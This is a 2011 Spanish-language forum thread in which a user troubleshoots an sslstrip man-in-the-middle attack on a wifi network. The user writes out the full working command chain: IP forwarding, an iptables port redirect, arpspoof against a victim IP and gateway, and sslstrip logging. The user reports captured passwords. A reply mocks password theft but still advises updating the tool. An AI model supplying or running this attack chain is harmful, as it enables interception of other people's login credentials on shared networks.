sslstrip & backtrack 5: No entra en la pagina

Iniciado por Gambino_88, 15 Junio 2011, 22:04 PM

0 Miembros y 1 Visitante están viendo este tema.

Gambino_88

Estoy utilizando Backtrack 5 para intentar snifar el trafico https de mi red wifi.

Tras realizar el ataque cuando entro a una pagina https desde el ordenador victima, me he fijado que si se ha eliminado el ssl (La pagina es http en vez de https, hasta ahi todo perfecto)

Pero cuando introduzco mi user y contraseña para hacer login, al aceptar me vuelve a dirigir a la pagina del login, como que los el user y password fuesen incorrectos.

Al mirar el archivo sslstrip.log veo que las contraseñas han quedado guardadas, como que todo hubiera ido normal.

Los comandos que utilizo son estos:

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1    (siendo la 1era la victima y la 2a el gateway, aunque lo he probado tambien del reves)

cd /pentest/web/sslstrip
python sslstrip.py -l 8080

Y despues abro el archivo sslstrip.log


Alguien me puede echar una mano?
Gracias de antemano.


int_0x40

#1
Si eres del 88 estas muy chavo para hacer carrera profesional de "roba-passwords-de-hotmail", eso dejaselo a egresados de Palito y Bolita II. Supongo que te leiste con gran felicidad el tuto que hizo sozemu y te fijarias que hay que actualizar a la ultima version de sslstrip. Ademas puede ser que el usuario del que obtuviste pass este logeado. No quiero creer en la posibilidad de que alguien en la red local te pueda estar pagando con la misma moneda haciendo forwarding a tus paquetes y presentandote un documento de login apocrifo. xDD

Un saludo
"The girl i love...she got long black wavy hair "